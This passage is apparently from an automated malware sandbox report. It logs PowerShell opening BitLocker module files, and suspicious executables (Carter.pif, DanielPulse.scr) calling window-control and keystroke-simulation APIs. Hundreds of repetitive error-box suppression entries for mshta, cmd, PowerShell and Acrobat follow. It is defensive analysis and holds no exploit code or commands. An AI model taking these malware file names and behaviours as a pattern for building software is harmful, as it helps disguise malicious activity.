              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,28_2_010659B3
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FF5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,28_2_00FF5EDA
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_008B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,36_2_008B59B3
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00845EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,36_2_00845EDA
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010033B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_010033B7
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
